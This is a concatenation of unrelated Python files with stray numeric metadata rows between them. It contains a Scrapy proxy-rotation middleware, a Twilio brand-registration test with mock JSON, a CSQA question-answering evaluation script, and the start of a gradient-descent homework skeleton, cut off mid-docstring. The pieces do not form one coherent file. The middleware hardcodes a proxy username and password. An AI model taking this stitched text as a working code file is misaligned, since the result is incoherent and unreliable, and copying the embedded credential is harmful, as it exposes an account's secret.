# request.headers['Proxy-Authorization'] = ''
# request.meta['proxy'] = ''
class ProxyWeeklyRandomHttpsMiddleware(object):
def process_request(self, request, spider):
today = datetime.date.today()
today_day = int(today.strftime("%d"))
today_proxy = today_day % 3
if today_proxy == 0:
request.meta['proxy'] = "https://us-wa.proxymesh.com:31280" # "http://45.63.58.8:8080"
elif today_proxy == 1:
request.meta['proxy'] = "https://us-dc.proxymesh.com:31280" # "http://45.63.58.8:8080"
else:
request.meta['proxy'] = "https://us-ca.proxymesh.com:31280" # "http://45.63.58.8:8080"
class ProxyHttpsMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us-il.proxymesh.com:31280"
class ProxyUSAMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us.proxymesh.com:31280"
proxy_user_pass = "reeves:11111111"
encoded_user_pass = base64.encodestring(proxy_user_pass)
request.headers['Proxy-Authorization'] = 'Basic ' + encoded_user_pass
class ProxyGiltMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = 'https://au.proxymesh.com:31280'
class ProxyUKMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://uk.proxymesh.com:31280"
class ProxyHttpsUSAMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us.proxymesh.com:31280"
class ProxynHttpsNLMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://nl.proxymesh.com:31280"
class ProxynHttpsSGMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://sg.proxymesh.com:31280"
class ProxyHttpsRandomMiddleware(object):
def process_request(self, request, spider):
us_proxies = [
"https://us-il.proxymesh.com:31280",
"https://us-ca.proxymesh.com:31280",
"https://us-dc.proxymesh.com:31280",
"https://us-fl.proxymesh.com:31280",
"https://us-wa.proxymesh.com:31280",
"https://us-ny.proxymesh.com:31280",
"https://us.proxymesh.com:31280",
"https://uk.proxymesh.com:31280",
'https://au.proxymesh.com:31280',
"https://nl.proxymesh.com:31280",
"https://sg.proxymesh.com:31280",
""
]
proxy = random.choice(us_proxies)
request.meta['proxy'] = proxy
class ProxyHttpsUSAILMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us-il.proxymesh.com:31280"
class ProxyHttpsUSACAMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us-ca.proxymesh.com:31280"
class ProxyHttpsUSADCMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us-dc.proxymesh.com:31280"
class ProxyHttpsUSAFLMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us-fl.proxymesh.com:31280"
class ProxyHttpsUSAWAMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us-wa.proxymesh.com:31280"
| 36.946078
| 134
| 0.592676
| 853
| 7,537
| 5.138335
| 0.117233
| 0.142368
| 0.201688
| 0.130504
| 0.83071
| 0.790098
| 0.778919
| 0.749487
| 0.719827
| 0.698152
| 0
| 0.075155
| 0.249701
| 7,537
| 203
| 135
| 37.128079
| 0.699912
| 0.255937
| 0
| 0.526316
| 0
| 0
| 0.248873
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157895
| false
| 0.078947
| 0.04386
| 0
| 0.359649
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
87f135debed373b33e9d602b5dd4d1ba948cf1ff
| 7,225
|
py
|
Python
|
tests/integration/messaging/v1/test_brand_registration.py
|
MikeOwino/twilio-python
|
e5c0f749eaa1a44fab12dd40cd2e7618cb2ce836
|
[
"MIT"
] | 1,362
|
2015-01-04T10:25:18.000Z
|
2022-03-24T10:07:08.000Z
|
tests/integration/messaging/v1/test_brand_registration.py
|
MikeOwino/twilio-python
|
e5c0f749eaa1a44fab12dd40cd2e7618cb2ce836
|
[
"MIT"
] | 299
|
2015-01-30T09:52:39.000Z
|
2022-03-31T23:03:02.000Z
|
tests/integration/messaging/v1/test_brand_registration.py
|
kaidisn/twilio-python
|
63d09bea6ea58a1e1f52420eab056480ad01dc61
|
[
"MIT"
] | 622
|
2015-01-03T04:43:09.000Z
|
2022-03-29T14:11:00.000Z
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class BrandRegistrationTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.messaging.v1.brand_registrations("BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://messaging.twilio.com/v1/a2p/BrandRegistrations/BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "BN0044409f7e067e279523808d267e2d85",
"account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
"customer_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"a2p_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"date_created": "2021-01-27T14:18:35Z",
"date_updated": "2021-01-27T14:18:36Z",
"brand_type": "STANDARD",
"status": "PENDING",
"tcr_id": "BXXXXXX",
"failure_reason": "Registration error",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
"brand_score": 42,
"brand_feedback": [
"TAX_ID",
"NONPROFIT"
],
"identity_status": "VERIFIED",
"russell_3000": true,
"tax_exempt_status": "501c3",
"skip_automatic_sec_vet": false,
"mock": false,
"links": {
"brand_vettings": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85/Vettings"
}
}
'''
))
actual = self.client.messaging.v1.brand_registrations("BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.messaging.v1.brand_registrations.list()
self.holodeck.assert_has_request(Request(
'get',
'https://messaging.twilio.com/v1/a2p/BrandRegistrations',
))
def test_read_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations?PageSize=50&Page=0",
"previous_page_url": null,
"next_page_url": null,
"key": "data",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations?PageSize=50&Page=0"
},
"data": [
{
"sid": "BN0044409f7e067e279523808d267e2d85",
"account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
"customer_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"a2p_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"date_created": "2021-01-27T14:18:35Z",
"date_updated": "2021-01-27T14:18:36Z",
"brand_type": "STANDARD",
"status": "APPROVED",
"tcr_id": "BXXXXXX",
"failure_reason": "Registration error",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
"brand_score": 42,
"brand_feedback": [
"TAX_ID",
"NONPROFIT"
],
"identity_status": "VERIFIED",
"russell_3000": true,
"tax_exempt_status": "501c3",
"skip_automatic_sec_vet": false,
"mock": false,
"links": {
"brand_vettings": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85/Vettings"
}
}
]
}
'''
))
actual = self.client.messaging.v1.brand_registrations.list()
self.assertIsNotNone(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.messaging.v1.brand_registrations.create(customer_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", a2p_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX")
values = {
'CustomerProfileBundleSid': "BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
'A2PProfileBundleSid': "BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
}
self.holodeck.assert_has_request(Request(
'post',
'https://messaging.twilio.com/v1/a2p/BrandRegistrations',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "BN0044409f7e067e279523808d267e2d85",
"account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
"customer_profile_bundle_sid": "BU0000009f7e067e279523808d267e2d90",
"a2p_profile_bundle_sid": "BU1111109f7e067e279523808d267e2d85",
"date_created": "2021-01-28T10:45:51Z",
"date_updated": "2021-01-28T10:45:51Z",
"brand_type": "STANDARD",
"status": "PENDING",
"tcr_id": "BXXXXXX",
"failure_reason": "Registration error",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
"brand_score": 42,
"brand_feedback": [
"TAX_ID",
"NONPROFIT"
],
"identity_status": "VERIFIED",
"russell_3000": true,
"tax_exempt_status": "501c3",
"skip_automatic_sec_vet": false,
"mock": false,
"links": {
"brand_vettings": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85/Vettings"
}
}
'''
))
actual = self.client.messaging.v1.brand_registrations.create(customer_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", a2p_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX")
self.assertIsNotNone(actual)
| 40.363128
| 195
| 0.544083
| 538
| 7,225
| 7.081784
| 0.226766
| 0.04042
| 0.057743
| 0.066404
| 0.823622
| 0.800525
| 0.78189
| 0.749344
| 0.746194
| 0.697113
| 0
| 0.135112
| 0.346436
| 7,225
| 178
| 196
| 40.589888
| 0.671749
| 0.015087
| 0
| 0.509434
| 1
| 0
| 0.208466
| 0.118211
| 0
| 0
| 0
| 0
| 0.169811
| 1
| 0.113208
| false
| 0
| 0.075472
| 0
| 0.207547
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
357d9addc20f28cf14355c82eb3d6c16ff9e8138
| 21,453
|
py
|
Python
|
S2SRL/SymbolicExecutor/calculate_sample_test_dataset.py
|
DevinJake/MRL-CQA
|
f4eee239212fb8a2034834fac61675eedf72c98c
|
[
"MIT"
] | 13
|
2020-11-04T02:38:31.000Z
|
2021-09-16T11:25:44.000Z
|
S2SRL/SymbolicExecutor/calculate_sample_test_dataset.py
|
DevinJake/MRL-CQA
|
f4eee239212fb8a2034834fac61675eedf72c98c
|
[
"MIT"
] | null | null | null |
S2SRL/SymbolicExecutor/calculate_sample_test_dataset.py
|
DevinJake/MRL-CQA
|
f4eee239212fb8a2034834fac61675eedf72c98c
|
[
"MIT"
] | 5
|
2021-03-26T09:15:04.000Z
|
2021-07-28T02:33:53.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2019/4/8 21:02
# @Author : Yaoleo
# @Blog : yaoleo.github.io
# coding:utf-8
'''Get all questions, annotated actions, entities, relations, types together in JSON format.
'''
import json
from symbolics import Symbolics
from transform_util import transformBooleanToString, list2dict
import logging
def transMask2Action(state, withint):
if withint:
json_path = '../../data/auto_QA_data/CSQA_ANNOTATIONS_test_INT.json'
question_path = '../../data/auto_QA_data/mask_test/SAMPLE_FINAL_INT_test.question'
else:
json_path = '../../data/auto_QA_data/CSQA_ANNOTATIONS_test.json'
question_path = '../../data/auto_QA_data/mask_test/SAMPLE_FINAL_test.question'
with open(json_path, 'r') as load_f, open("../../data/saves/crossent_even_1%_att=0_withINT/sample_final_int_predict.actions", 'r') as predict_actions \
, open(question_path, 'r') as RL_test:
# with open("../../data/auto_QA_data/CSQA_ANNOTATIONS_test.json", 'r') as load_f, open("../../data/saves/rl_even_TR_batch8_1%/final_predict.actions", 'r') as predict_actions \
# , open("../../data/auto_QA_data/mask_test/FINAL_test.question", 'r') as RL_test:
linelist = list()
load_dict = json.load(load_f)
num = 0
total_precision = 0
total_recall = 0
total_right_count = 0
total_answer_count = 0
total_response_count = 0
bool_right_count = 0
count_right_count = 0
for x, y in zip(predict_actions, RL_test):
action = x.strip().split(":")[1]
id = y.strip().split()[0]
if (id.startswith(state)):
num += 1
entity_mask = load_dict[id]["entity_mask"] if load_dict[id]["entity_mask"] != None else {}
relation_mask = load_dict[id]["relation_mask"] if load_dict[id]["relation_mask"] != None else {}
type_mask = load_dict[id]["type_mask"] if load_dict[id]["type_mask"] != None else {}
# todo: test
int_mask = load_dict[id]["int_mask"] if 'int_mask' in load_dict[id] else {}
response_entities = load_dict[id]["response_entities"].strip() if load_dict[id]["response_entities"] != None else ""
response_entities = response_entities.strip().split("|")
orig_response = load_dict[id]["orig_response"].strip() if load_dict[id]["orig_response"] != None else ""
# Update(add) elements in dict.
entity_mask.update(relation_mask)
entity_mask.update(type_mask)
# todo: test
entity_mask.update(int_mask)
new_action = list()
# Default separator of split() method is any whitespace.
for act in action.split():
for k, v in entity_mask.items():
if act == v:
act = k
break
new_action.append(act)
print("{0}".format(num))
'''print("{0}: {1}->{2}".format(num, id, action))'''
logging.info("%d: %s -> %s", num, id, action)
#print(" ".join(new_action))
symbolic_seq = list2dict(new_action)
# symbolic_seq.append({"A11":["","",""]})### A11
# Modify with magic.
# if state.startswith("Verification(Boolean)(All)"):
# symbolic_seq[-1] = {"A3":["","",""]} if not symbolic_seq[-1].has_key("A3") else symbolic_seq[-1]### A3
# if state.startswith("QuantitativeReasoning(Count)(All)") or state.startswith("ComparativeReasoning(Count)(All)"):
# symbolic_seq[-1] = {"A11": ["", "", ""]} if not symbolic_seq[-1].has_key("A11") else symbolic_seq[-1]
symbolic_exe = Symbolics(symbolic_seq)
answer = symbolic_exe.executor()
if state.startswith("QuantitativeReasoning(Count)(All)") or state.startswith("ComparativeReasoning(Count)(All)"):
'''print (symbolic_seq)
print ("%s::%s" %(answer, orig_response))'''
logging.info(symbolic_seq)
logging.info("answer:%s, orig_response:%s", answer, orig_response)
if orig_response.isdigit() and answer == int(orig_response):
count_right_count += 1
'''print ("count_right_count+1")'''
logging.info("count_right_count+1")
else:
import re
orig_response = re.findall(r"\d+\.?\d*", orig_response)
orig_response = sum([int(i) for i in orig_response])
if answer == orig_response:
count_right_count += 1
'''print ("count_right_count+1")'''
logging.info("count_right_count+1")
# TODO: how to compute accuracy of BOOLEAN? By using response or response_bools?
# For boolean, the returned answer is a list.
if state.startswith("Verification(Boolean)(All)"):
# To judge the returned answers are in dict format or boolean format.
if (type(answer) == dict):
temp = []
if '|BOOL_RESULT|' in answer:
temp.extend(answer['|BOOL_RESULT|'])
answer = temp
answer_string = transformBooleanToString(answer)
if answer_string!='' and answer_string == orig_response:
bool_right_count += 1
'''print("bool_right_count+1")'''
logging.info("bool_right_count+1")
else:
if answer == True:
answer = "YES"
if answer == False:
answer = "NO"
if answer == orig_response:
bool_right_count += 1
'''print("bool_right_count+1")'''
logging.info("bool_right_count+1")
# To judge the returned answers are in dict format or boolean format.
if (type(answer) == dict):
temp = []
if '|BOOL_RESULT|' in answer:
temp.extend(answer['|BOOL_RESULT|'])
else:
for key, value in answer.items():
if (value):
temp.extend(list(value))
answer = temp
elif type(answer) == type([]) or type(answer) == type(set([])):
answer = sorted((list(answer)))
elif type(answer) == int:
answer = [answer]
else:
answer = [answer]
right_count = 0
for e in response_entities:
if (e in answer):
right_count += 1
total_right_count += right_count
total_answer_count += len(answer)
total_response_count += len(response_entities)
precision = right_count / float(len(answer)) if len(answer) != 0 else 0
total_precision += precision
recall = (right_count / float(len(response_entities))) if len(response_entities) != 0 else 0
total_recall += recall
'''print("orig:", len(response_entities), "answer:", len(answer), "right:", right_count)
print("Precision:", precision),
print("Recall:", recall)
print('===============================')'''
logging.info("orig:%d, answer:%d, right:%d", len(response_entities), len(answer), right_count)
logging.info("Precision:%f", precision)
logging.info("Recall:%f", recall)
logging.info("============================")
# print answer
string_bool_right = "bool_right_count: %d" %bool_right_count
string_count_right_count = "count_right_count: %d" %count_right_count
string_total_num = "total_num::total_right::total_answer::total_response -> %d::%d::%d::%d" %(num, total_right_count, total_answer_count, total_response_count)
print (string_bool_right)
print (string_count_right_count)
print (string_total_num)
logging.info("bool_right_count:%d", bool_right_count)
logging.info("count_right_count:%d", count_right_count)
logging.info("total_num::total_right::total_answer::total_response -> %d::%d::%d::%d", num, total_right_count, total_answer_count, total_response_count)
linelist.append(string_bool_right + '\r\n')
linelist.append(string_count_right_count + '\r\n')
linelist.append(string_total_num + '\r\n')
mean_pre = total_precision / num if num!=0 else 0.0
mean_recall = total_recall / num if num!=0 else 0.0
mean_pre2 = float(total_right_count) / total_answer_count if total_answer_count!=0 else 0.0
mean_recall2 = float(total_right_count) / total_response_count if total_response_count!=0 else 0.0
string_mean_pre = "state::mean_pre::mean_recall -> %s::%f::%f" %(state, mean_pre, mean_recall)
string_mean_pre2 = "state::mean_pre2::mean_recall2 -> %s::%f::%f" %(state, mean_pre2, mean_recall2)
print(string_mean_pre)
print(string_mean_pre2)
print("++++++++++++++")
logging.info("state::mean_pre::mean_recall -> %s::%f::%f", state, mean_pre, mean_recall)
logging.info("state::mean_pre2::mean_recall2 -> %s::%f::%f", state, mean_pre2, mean_recall2)
logging.info("++++++++++++++")
linelist.append(string_mean_pre + '\r\n')
linelist.append(string_mean_pre2 + '\r\n')
linelist.append('++++++++++++++\n\n')
return linelist
def transMask2ActionMAML(state, withint):
if withint:
path = '../../data/auto_QA_data/CSQA_ANNOTATIONS_test_INT.json'
else:
path = '../../data/auto_QA_data/CSQA_ANNOTATIONS_test.json'
with open(path, 'r') as load_f, open("../../data/saves/maml_reptile/final_maml_predict.actions", 'r') as predict_actions:
# with open("../../data/auto_QA_data/CSQA_ANNOTATIONS_test.json", 'r') as load_f, open("../../data/saves/rl_even_TR_batch8_1%/final_predict.actions", 'r') as predict_actions \
# , open("../../data/auto_QA_data/mask_test/FINAL_test.question", 'r') as RL_test:
linelist = list()
load_dict = json.load(load_f)
num = 0
total_precision = 0
total_recall = 0
total_right_count = 0
total_answer_count = 0
total_response_count = 0
bool_right_count = 0
count_right_count = 0
for x in predict_actions:
action = x.strip().split(":")[1]
id = x.strip().split(":")[0]
if (id.startswith(state)):
num += 1
entity_mask = load_dict[id]["entity_mask"] if load_dict[id]["entity_mask"] != None else {}
relation_mask = load_dict[id]["relation_mask"] if load_dict[id]["relation_mask"] != None else {}
type_mask = load_dict[id]["type_mask"] if load_dict[id]["type_mask"] != None else {}
# todo: test
int_mask = load_dict[id]["int_mask"] if 'int_mask' in load_dict[id] else {}
response_entities = load_dict[id]["response_entities"].strip() if load_dict[id]["response_entities"] != None else ""
response_entities = response_entities.strip().split("|")
orig_response = load_dict[id]["orig_response"].strip() if load_dict[id]["orig_response"] != None else ""
# Update(add) elements in dict.
entity_mask.update(relation_mask)
entity_mask.update(type_mask)
# todo: test
entity_mask.update(int_mask)
new_action = list()
# Default separator of split() method is any whitespace.
for act in action.split():
for k, v in entity_mask.items():
if act == v:
act = k
break
new_action.append(act)
print("{0}".format(num))
'''print("{0}: {1}->{2}".format(num, id, action))'''
logging.info("%d: %s -> %s", num, id, action)
#print(" ".join(new_action))
symbolic_seq = list2dict(new_action)
# symbolic_seq.append({"A11":["","",""]})### A11
# Modify with magic.
# if state.startswith("Verification(Boolean)(All)"):
# symbolic_seq[-1] = {"A3":["","",""]} if not symbolic_seq[-1].has_key("A3") else symbolic_seq[-1]### A3
# if state.startswith("QuantitativeReasoning(Count)(All)") or state.startswith("ComparativeReasoning(Count)(All)"):
# symbolic_seq[-1] = {"A11": ["", "", ""]} if not symbolic_seq[-1].has_key("A11") else symbolic_seq[-1]
symbolic_exe = Symbolics(symbolic_seq)
answer = symbolic_exe.executor()
if state.startswith("QuantitativeReasoning(Count)(All)") or state.startswith("ComparativeReasoning(Count)(All)"):
'''print (symbolic_seq)
print ("%s::%s" %(answer, orig_response))'''
logging.info(symbolic_seq)
logging.info("answer:%s, orig_response:%s", answer, orig_response)
if orig_response.isdigit() and answer == int(orig_response):
count_right_count += 1
'''print ("count_right_count+1")'''
logging.info("count_right_count+1")
else:
import re
orig_response = re.findall(r"\d+\.?\d*", orig_response)
orig_response = sum([int(i) for i in orig_response])
if answer == orig_response:
count_right_count += 1
'''print ("count_right_count+1")'''
logging.info("count_right_count+1")
# TODO: how to compute accuracy of BOOLEAN? By using response or response_bools?
# For boolean, the returned answer is a list.
if state.startswith("Verification(Boolean)(All)"):
# To judge the returned answers are in dict format or boolean format.
if (type(answer) == dict):
temp = []
if '|BOOL_RESULT|' in answer:
temp.extend(answer['|BOOL_RESULT|'])
answer = temp
answer_string = transformBooleanToString(answer)
if answer_string!='' and answer_string == orig_response:
bool_right_count += 1
'''print("bool_right_count+1")'''
logging.info("bool_right_count+1")
else:
if answer == True:
answer = "YES"
if answer == False:
answer = "NO"
if answer == orig_response:
bool_right_count += 1
'''print("bool_right_count+1")'''
logging.info("bool_right_count+1")
# To judge the returned answers are in dict format or boolean format.
if (type(answer) == dict):
temp = []
if '|BOOL_RESULT|' in answer:
temp.extend(answer['|BOOL_RESULT|'])
else:
for key, value in answer.items():
if (value):
temp.extend(list(value))
answer = temp
elif type(answer) == type([]) or type(answer) == type(set([])):
answer = sorted((list(answer)))
elif type(answer) == int:
answer = [answer]
else:
answer = [answer]
right_count = 0
for e in response_entities:
if (e in answer):
right_count += 1
total_right_count += right_count
total_answer_count += len(answer)
total_response_count += len(response_entities)
precision = right_count / float(len(answer)) if len(answer) != 0 else 0
total_precision += precision
recall = (right_count / float(len(response_entities))) if len(response_entities) != 0 else 0
total_recall += recall
'''print("orig:", len(response_entities), "answer:", len(answer), "right:", right_count)
print("Precision:", precision),
print("Recall:", recall)
print('===============================')'''
logging.info("orig:%d, answer:%d, right:%d", len(response_entities), len(answer), right_count)
logging.info("Precision:%f", precision)
logging.info("Recall:%f", recall)
logging.info("============================")
# print answer
string_bool_right = "bool_right_count: %d" %bool_right_count
string_count_right_count = "count_right_count: %d" %count_right_count
string_total_num = "total_num::total_right::total_answer::total_response -> %d::%d::%d::%d" %(num, total_right_count, total_answer_count, total_response_count)
print (string_bool_right)
print (string_count_right_count)
print (string_total_num)
logging.info("bool_right_count:%d", bool_right_count)
logging.info("count_right_count:%d", count_right_count)
logging.info("total_num::total_right::total_answer::total_response -> %d::%d::%d::%d", num, total_right_count, total_answer_count, total_response_count)
linelist.append(string_bool_right + '\r\n')
linelist.append(string_count_right_count + '\r\n')
linelist.append(string_total_num + '\r\n')
mean_pre = total_precision / num if num!=0 else 0.0
mean_recall = total_recall / num if num!=0 else 0.0
mean_pre2 = float(total_right_count) / total_answer_count if total_answer_count!=0 else 0.0
mean_recall2 = float(total_right_count) / total_response_count if total_response_count!=0 else 0.0
string_mean_pre = "state::mean_pre::mean_recall -> %s::%f::%f" %(state, mean_pre, mean_recall)
string_mean_pre2 = "state::mean_pre2::mean_recall2 -> %s::%f::%f" %(state, mean_pre2, mean_recall2)
print(string_mean_pre)
print(string_mean_pre2)
print("++++++++++++++")
logging.info("state::mean_pre::mean_recall -> %s::%f::%f", state, mean_pre, mean_recall)
logging.info("state::mean_pre2::mean_recall2 -> %s::%f::%f", state, mean_pre2, mean_recall2)
logging.info("++++++++++++++")
linelist.append(string_mean_pre + '\r\n')
linelist.append(string_mean_pre2 + '\r\n')
linelist.append('++++++++++++++\n\n')
return linelist
def calculate_RL_or_DL_result(file_path, withint):
path = '../../data/auto_QA_data/test_result/'+file_path+'.txt'
linelist = list()
fw = open(path, 'w', encoding = "UTF-8")
# fw = open('../../data/auto_QA_data/test_result/1%_full_test_result_TR_batch8.txt', 'w', encoding="UTF-8")
state_list = ["SimpleQuestion(Direct)", "Verification(Boolean)(All)", "QuantitativeReasoning(Count)(All)",
"QuantitativeReasoning(All)", "ComparativeReasoning(Count)(All)", "ComparativeReasoning(All)",
"LogicalReasoning(All)"]
# state_list = ["Verification(Boolean)(All)"]
for state in state_list:
linelist += transMask2Action(state, withint)
fw.writelines(linelist)
fw.close()
def calculate_MAML_result(file_path, withint):
path = '../../data/auto_QA_data/test_result/'+file_path+'.txt'
linelist = list()
fw = open(path, 'w', encoding="UTF-8")
# fw = open('../../data/auto_QA_data/test_result/1%_full_test_result_TR_batch8.txt', 'w', encoding="UTF-8")
state_list = ["SimpleQuestion(Direct)", "Verification(Boolean)(All)", "QuantitativeReasoning(Count)(All)",
"QuantitativeReasoning(All)", "ComparativeReasoning(Count)(All)", "ComparativeReasoning(All)",
"LogicalReasoning(All)"]
# state_list = ["Verification(Boolean)(All)"]
for state in state_list:
linelist += transMask2ActionMAML(state, withint)
fw.writelines(linelist)
fw.close()
if __name__ == "__main__":
# calculate_RL_or_DL_result('crossent_even_1%_att=0_withINT', withint=True)
calculate_MAML_result('maml_reptile_full_test', withint=False)
| 55.291237
| 183
| 0.540577
| 2,395
| 21,453
| 4.581211
| 0.079749
| 0.069267
| 0.041013
| 0.017864
| 0.945771
| 0.94249
| 0.931006
| 0.920707
| 0.91615
| 0.908312
| 0
| 0.012731
| 0.322659
| 21,453
| 387
| 184
| 55.434109
| 0.742344
| 0.129819
| 0
| 0.915254
| 0
| 0
| 0.163272
| 0.091592
| 0
| 0
| 0
| 0.010336
| 0
| 1
| 0.013559
| false
| 0
| 0.020339
| 0
| 0.040678
| 0.047458
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
35c24cee240e1717af999daba2e9177027a9d3e0
| 13,520
|
py
|
Python
|
2021-fall-part-1/hws/HW4_gradient_descent_pr/utils.py
|
bagrorg/ml-course
|
9a2aa7379ea0dee6968eef3a4ae5926e83c391ca
|
[
"MIT"
] | 4
|
2021-02-01T19:57:40.000Z
|
2021-08-02T14:45:34.000Z
|
2021-fall-part-1/hws/HW4_gradient_descent_pr/utils.py
|
bagrorg/ml-course
|
9a2aa7379ea0dee6968eef3a4ae5926e83c391ca
|
[
"MIT"
] | null | null | null |
2021-fall-part-1/hws/HW4_gradient_descent_pr/utils.py
|
bagrorg/ml-course
|
9a2aa7379ea0dee6968eef3a4ae5926e83c391ca
|
[
"MIT"
] | 13
|
2021-09-02T07:29:24.000Z
|
2021-12-13T15:26:00.000Z
|
from __future__ import annotations
import numpy as np
s0_default: float = 1
p_default: float = 0.5
batch_size_default: int = 1
alpha_default: float = 0.1
eps_default: float = 1e-8
mu_default = 1e-2
tolerance_default: float = 1e-3
max_iter_default: int = 1000
class BaseDescent:
"""
A base class and examples for all functions
"""
def __init__(self):
self.w = None
def step(self, X: np.ndarray, y: np.ndarray, iteration: int) -> np.ndarray:
"""
Descent step
:param iteration: iteration number
:param X: objects' features
:param y: objects' targets
:return: difference between weights
"""
return self.update_weights(self.calc_gradient(X, y), iteration)
def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
"""
Example for update_weights function
:param iteration: iteration number
:param gradient: gradient
:return: weight difference: np.ndarray
"""
pass
def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
"""
Example for calc_gradient function
:param X: objects' features
:param y: objects' targets
:return: gradient: np.ndarray
"""
pass
class GradientDescent(BaseDescent):
"""
Full gradient descent class
"""
def __init__(self, w0: np.ndarray, lambda_: float, s0: float = s0_default, p: float = p_default):
"""
:param w0: weight initialization
:param lambda_: learning rate parameter (float)
:param s0: learning rate parameter (float)
:param p: learning rate parameter (float)
"""
super().__init__()
self.eta = lambda k: lambda_ * (s0 / (s0 + k)) ** p
self.w = np.copy(w0)
def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
"""
Changing weights with respect to gradient
:param iteration: iteration number
:param gradient: gradient
:return: weight difference: np.ndarray
"""
# TODO: implement updating weights function
raise NotImplementedError('GradientDescent update_weights function not implemented')
def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
"""
Getting objects, calculating gradient at point w
:param X: objects' features
:param y: objects' targets
:return: gradient: np.ndarray
"""
# TODO: implement calculating gradient function
raise NotImplementedError('GradientDescent calc_gradient function not implemented')
class StochasticDescent(BaseDescent):
"""
Stochastic gradient descent class
"""
def __init__(self, w0: np.ndarray, lambda_: float, s0: float = s0_default, p: float = p_default,
batch_size: int = batch_size_default):
"""
:param w0: weight initialization
:param lambda_: learning rate parameter (float)
:param s0: learning rate parameter (float)
:param p: learning rate parameter (float)
:param batch_size: batch size (int)
"""
super().__init__()
self.eta = lambda k: lambda_ * (s0 / (s0 + k)) ** p
self.batch_size = batch_size
self.w = np.copy(w0)
def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
"""
Changing weights with respect to gradient
:param iteration: iteration number
:param gradient: gradient estimate
:return: weight difference: np.ndarray
"""
# TODO: implement updating weights function
raise NotImplementedError('StochasticDescent update_weights function not implemented')
def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
"""
Getting objects, calculating gradient at point w
:param X: objects' features
:param y: objects' targets
:return: gradient: np.ndarray
